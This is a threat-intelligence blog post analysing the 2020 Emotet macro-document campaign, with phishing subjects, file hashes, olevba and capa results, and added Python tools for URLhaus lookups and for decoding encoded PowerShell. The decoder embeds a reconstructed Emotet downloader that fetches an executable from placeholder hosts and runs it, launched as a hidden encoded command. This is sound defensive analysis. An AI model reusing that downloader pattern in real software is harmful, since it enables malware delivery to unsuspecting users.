Emotet Maldoc Campaign — July 2020

Lounge Fly
5 min read · Sep 11, 2020

Summary

Emotet is one of the most prevalent trojans and malware delivery networks observed in the wild. In 2019 it accounted for the large majority of sandbox submissions observed at any.run, and not by a small margin. Emotet was first observed in campaigns as early as 2014, when it was a banking trojan focused mostly on information stealing. As development continued over the years its capabilities expanded to a number of additional modules that help establish a foothold and spread laterally, most recently a module that spreads over nearby Wi-Fi networks. Emotet campaigns are also commonly seen delivering other malware such as Trickbot and Qakbot (QBot).

It had been over 160 days since fresh Emotet campaigns were observed, according to researchers at Proofpoint. The previous set of campaigns came to a halt shortly after JPCERT/CC released a detection utility (EmoCheck) in early February. On July 17th, Cryptolaemus, a group of researchers who track Emotet, published botnet activity data derived from Spamhaus that suggested new campaigns were imminent.

Shortly after that activity was observed, Emotet malicious spam and document campaigns began. As in previous campaigns, the emails carry either an attached macro-embedded Word document or a URL to one hosted on compromised WordPress sites. The documents use PowerShell to download the second stage of the infection.

Analysis

The Emotet phishing emails vary in sender, subject and message body. Some emails link to the macro-enabled Word document whereas others attach it. Intelligence collected from vendors and information-sharing communities shows many common subjects built around keywords such as Invoice, Response and Purchase Order. Examples of observed subjects include:

  • Scan
  • Payroll
  • Invoice #xxxxxx
  • Inv #xxxxxx
  • ‘Target’s Name’
  • Call me
  • Payoff Error Refund
  • Log in form
  • Please approve

A sample message body from earlier campaigns can be seen below.

Most of the emails contain links to the Word document rather than attachments.

URLs in the messages can be queried against abuse.ch’s URLhaus. This service is one of the primary sharing channels used by the researchers tracking Emotet, making it a good first OSINT stop when Emotet is suspected.

The results are tagged accordingly and even identify the associated epoch. An epoch is the classification of a distinct Emotet botnet: Epoch 1, Epoch 2 and Epoch 3 each run independent infrastructure with their own timelines and release cadence for updates, and each epoch embeds a distinct RSA public key for its C2 communication. abuse.ch also forwards abuse reports to hosting providers once a URL is submitted, so many of the URLs are taken down shortly after submission. For the URLs that were still up, navigating to them resulted in the download of a macro-embedded Word document in every case. A number of the documents were analyzed and are listed below.
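The URLhaus lookup described above, as an added example that is not part of the original post and not code from abuse.ch. It uses the public URLhaus URL-lookup endpoint (https://urlhaus-api.abuse.ch/v1/url/) and reduces the response to the fields that matter for Emotet triage: whether the URL is known, whether it is still online, the epoch tag and what payload it served. The response embedded in the block is constructed to match the API's shape; its host, ID and hashes are placeholders, not real indicators. It also assumes that abuse.ch now requires an Auth-Key header, so pass the key you registered with them for live queries.

```python
"""Look up suspected Emotet URLs in abuse.ch URLhaus and summarise the hit.

Added example for this write-up; not code from the original post or from
abuse.ch. query_urlhaus() talks to the real API and is the only part that
needs the network. SAMPLE_RESPONSE below is CONSTRUCTED in the API's shape:
the host, ID and hashes are placeholders, not real indicators.
"""
import json
import re
import urllib.parse
import urllib.request
from typing import Any, Dict, List

URLHAUS_API = "https://urlhaus-api.abuse.ch/v1/url/"
EPOCH_TAG = re.compile(r"^epoch(\d+)$")
EMOTET_TAGS = {"emotet", "heodo", "geodo"}   # names URLhaus reporters use


def query_urlhaus(url: str, auth_key: str = "", timeout: int = 15) -> Dict[str, Any]:
    """POST the URL to URLhaus and return the decoded JSON body.

    Assumption: abuse.ch now requires an Auth-Key header; pass the key you
    registered with them (the header is omitted when auth_key is empty).
    """
    data = urllib.parse.urlencode({"url": url}).encode()
    req = urllib.request.Request(URLHAUS_API, data=data, method="POST")
    if auth_key:
        req.add_header("Auth-Key", auth_key)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def summarize(result: Dict[str, Any]) -> Dict[str, Any]:
    """Reduce a /v1/url/ response to what an Emotet triage needs:
    is it known, is it still online, which epoch, what did it serve."""
    if result.get("query_status") != "ok":
        return {"known": False, "status": result.get("query_status")}
    tags = [t.lower() for t in result.get("tags") or []]
    epochs: List[int] = []
    for t in tags:
        m = EPOCH_TAG.match(t)
        if m:
            epochs.append(int(m.group(1)))
    payloads = [
        {
            "filename": p.get("filename"),
            "file_type": p.get("file_type"),
            "sha256": p.get("response_sha256"),
            "signature": p.get("signature"),
        }
        for p in result.get("payloads") or []
    ]
    return {
        "known": True,
        "url_status": result.get("url_status"),   # "online" / "offline"
        "emotet": bool(EMOTET_TAGS & set(tags)),
        "epochs": sorted(set(epochs)),
        "tags": tags,
        "payloads": payloads,
        "reference": result.get("urlhaus_reference"),
    }


def summarize_json(body: str) -> Dict[str, Any]:
    """Convenience wrapper for a raw JSON body (e.g. a saved response)."""
    return summarize(json.loads(body))


# Constructed response: shape follows the URLhaus API docs, values are fake.
SAMPLE_RESPONSE = json.dumps({
    "query_status": "ok",
    "id": "000000",
    "urlhaus_reference": "https://urlhaus.abuse.ch/url/000000/",
    "url": "http://compromised-site.example/wp-content/uploads/2020/07/inv/",
    "url_status": "offline",
    "host": "compromised-site.example",
    "date_added": "2020-07-17 14:05:00 UTC",
    "threat": "malware_download",
    "tags": ["doc", "emotet", "epoch2", "heodo"],
    "payloads": [{
        "firstseen": "2020-07-17",
        "filename": "invoice.doc",
        "file_type": "doc",
        "response_size": "170000",
        "response_md5": "0" * 32,
        "response_sha256": "0" * 64,
        "signature": "Heodo",
    }],
})

if __name__ == "__main__":
    # Live use: summarize(query_urlhaus("http://<suspect-url>/", auth_key="..."))
    print(json.dumps(summarize_json(SAMPLE_RESPONSE), indent=2))
```

The summary is keyed on the tags URLhaus reporters apply rather than on the free-text `threat` field, because the tag set is what carries the epoch and the family name; an `offline` status combined with a `doc` payload still tells you which epoch's template the sample belongs to even after the host has been cleaned up.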

  • invoice.doc (MD5: cb70ec7f00f0a05fe5c0f5f59892e1a3)
  • Contract 07172020.doc (MD5: de91a9d6693ed342c68c4e146b5cbf12)
  • Form.doc (MD5: 38a19b0da844c18ca52ac34d95c4523c)
  • W-9.doc (MD5: 3fbbf63b4d3d9de4b4ea5d55eff60d88)
  • invoice1.doc (MD5: badf3dd80fb8a2a90b39fb60221bb5f8)

One way to find documents associated with the latest Emotet campaign is to search public submissions on app.any.run for the tag ‘emotet-doc’.

Although few indicators are common across the whole campaign, all of the documents looked the same visually in the early stages of the campaign and carried similarly obfuscated VBA that ultimately runs a PowerShell script attempting to download the payload from at least five distinct URLs.

Analysis of one of the samples (MD5: cb70ec7f00f0a05fe5c0f5f59892e1a3) using oledump and olevba yields the following results, indicating a few different possible obfuscation methods.

Olevba output

The VBA macro streams are then located by running oledump against the document (streams flagged ‘M’ contain macro code).

Standard Oledump output

Dumping the largest macro stream shows some of the obfuscated code, techniques and associated functions.

Oledump Macro 15 Output

The obfuscated strings can be deobfuscated to reveal the Base64-encoded PowerShell command and the five distinct download URLs it carries; dynamic analysis yields the same information. A FakeDNS service was used here to show the document cycling through all of the URLs.
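The decoding step described above, as an added example that is not part of the original post. The downloader script embedded in the block is a constructed stand-in modelled on the shape of the 2020 Emotet PowerShell (backtick-split method names, a single string holding all the URLs that is Split() on a `[char]` separator at run time, and a size check before the dropped file is run); its hosts are placeholders, not real indicators. The block shows how `-EncodedCommand` is actually encoded (Base64 over UTF-16LE, not ASCII), how to find the flag on a command line given that PowerShell accepts any unambiguous prefix, and how to recover the URL list by reading the script's own separator instead of guessing one.

```python
"""Decode the Base64-encoded PowerShell launched by an Emotet maldoc and
recover its download URLs.

Added example for this write-up, not code from the original post. The
downloader script below is CONSTRUCTED to mirror the 2020 Emotet shape
(backtick-split method names, one string holding all URLs that is Split()
on a [char] separator at run time); the hosts are placeholders, not IOCs.
"""
import base64
import re
from typing import List, Optional

# Constructed stand-in for the script olevba/oledump recovers from the macro.
SAMPLE_SCRIPT = (
    r"""$Hdvmcshm=$env:userprofile+'\'+'544'+'.exe';"""
    r"""$Qqjuhxsd=.('new-ob'+'je'+'ct') nEt.WeBclIeNT;"""
    r"""$Vbxtgkkf='http://host-one.example/wp-admin/kdx/"""
    r"""*https://host-two.example/wp-content/uploads/2020/07/ab/"""
    r"""*http://host-three.example/cgi-bin/q9/"""
    r"""*https://host-four.example/wp-includes/k1/"""
    r"""*http://host-five.example/images/r7/'."SpL`it"([char]42);"""
    r"""foreach($Kjafzvhw in $Vbxtgkkf){try{"""
    r"""$Qqjuhxsd."DOwnL`OA`dfIle"($Kjafzvhw,$Hdvmcshm);"""
    r"""If ((&('Get-Item') $Hdvmcshm)."Len`gTH" -ge 23456){"""
    r"""&('Invoke-Item') $Hdvmcshm;break}}catch{}}"""
)


def to_encoded_command(script: str) -> str:
    """What -EncodedCommand expects: UTF-16LE text, Base64-encoded.
    Only used here to build the constructed sample command line."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "powershell -w hidden -enc " + to_encoded_command(SAMPLE_SCRIPT)


def extract_encoded_command(cmdline: str) -> str:
    """Return the Base64 argument that follows an -EncodedCommand flag.
    PowerShell accepts any unambiguous prefix (-e, -ec, -enc, ...)."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] not in "-/":
            continue
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            return toks[i + 1].strip("'\"")
    raise ValueError("no -EncodedCommand argument found")


def decode_encoded_command(b64: str) -> str:
    """Base64 -> bytes -> UTF-16LE text (fix up missing '=' padding)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def normalize(script: str) -> str:
    """Cheap deobfuscation: strip backticks (DOwnL`OA`dfIle -> DOwnLOAdfIle)
    and merge adjacent literal concatenations ('new-ob'+'je'+'ct')."""
    script = script.replace("`", "")
    return re.sub(r"'\s*\+\s*'", "", script)


# Matches .Split([char]42) / ."Split"([char]64) / .Split('@') after normalize().
SPLIT_RE = re.compile(r"""split["']?\s*\(\s*(?:\[char\]\s*(\d+)|'(.)')\s*\)""", re.I)
# Fallback sweep; stops at quotes and the separators seen in 2020 samples.
URL_RE = re.compile(r"""https?://[^\s'"*@]+""", re.I)


def split_separator(script: str) -> Optional[str]:
    """Recover the character the script uses to Split() its URL list."""
    m = SPLIT_RE.search(script)
    if not m:
        return None
    return chr(int(m.group(1))) if m.group(1) else m.group(2)


def extract_urls(script: str) -> List[str]:
    """Prefer the script's own Split() separator; fall back to a regex sweep."""
    script = normalize(script)
    urls: List[str] = []
    sep = split_separator(script)
    if sep:
        for literal in re.findall(r"'([^']*)'", script):
            if "://" in literal:
                urls.extend(p.strip() for p in literal.split(sep) if "://" in p)
    if not urls:
        urls = URL_RE.findall(script)
    return list(dict.fromkeys(urls))  # de-duplicate, keep order


def urls_from_cmdline(cmdline: str) -> List[str]:
    """Full pipeline: command line -> Base64 -> script -> URL list."""
    return extract_urls(decode_encoded_command(extract_encoded_command(cmdline)))


if __name__ == "__main__":
    for i, url in enumerate(urls_from_cmdline(SAMPLE_CMDLINE), 1):
        print(f"[{i}] {url}")
```

Reading the separator out of the `Split()` call matters because the same template was shipped with `@`, `*` and other separators across epochs; a hard-coded split would silently return one long string instead of five URLs, and a downstream blocklist built from it would miss four of them. Backtick removal is safe for URL extraction but is not a general deobfuscator: inside double-quoted PowerShell strings a backtick is an escape character, so do not rely on the normalized text for anything beyond string recovery.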

FakeDNS queries

The number of URLs in each epoch continues to grow. Data collected on the 21st of July listed 179 URLs in Epoch 1, 296 in Epoch 2 and 104 in Epoch 3. Comprehensive IOC lists are provided courtesy of the Cryptolaemus team.

Next, we look at one of the executables downloaded onto the machine. At the time of writing there was evidence of Emotet/Geodo, Trickbot and Qakbot being delivered through the campaign. The sample referenced in this report (MD5: 108bead4a9ac8f250cdeb59be183547d) was identified as packed Emotet through signature matching and code reuse.

PEStudio

The observed binary copied itself to a newly created folder under AppData\Local. Other samples copied themselves to AppData\Local\Temp and spawned further processes. For more in-depth analysis of registry activity, API calls, process trees and strings, see the sandbox submissions listed in the supporting analysis section below.

The remainder of the analysis introduces capa. Recently released by FireEye’s FLARE team, capa provides a framework for the community to encode, recognize and share behaviors seen in malware. Analysts can quickly triage unknown binaries to gain insight into the capabilities of the examined file, and the detected capabilities are mapped to the MITRE ATT&CK framework.

Across the files analyzed, the capa results were identical, detecting capabilities such as obfuscation, encrypted data, clipboard access and more. As this is a packed sample, further capabilities would likely surface on the unpacked code.

Capa Output

Supporting Analysis

https://www.hybrid-analysis.com/sample/7d56379fa06ebd0b04e20badf1afc503467c37d622c7b88b833c5b9b7c5bd3ff/5f150a024395085a237be508

https://capesandbox.com/analysis/28003/

https://analyze.intezer.com/analyses/a1485ea5-73b2-40e2-9eaf-1b6964ba001f

Epoch 1

https://capesandbox.com/analysis/29441/

Epoch 2

https://capesandbox.com/analysis/29442/

Epoch 3

https://capesandbox.com/analysis/29443/
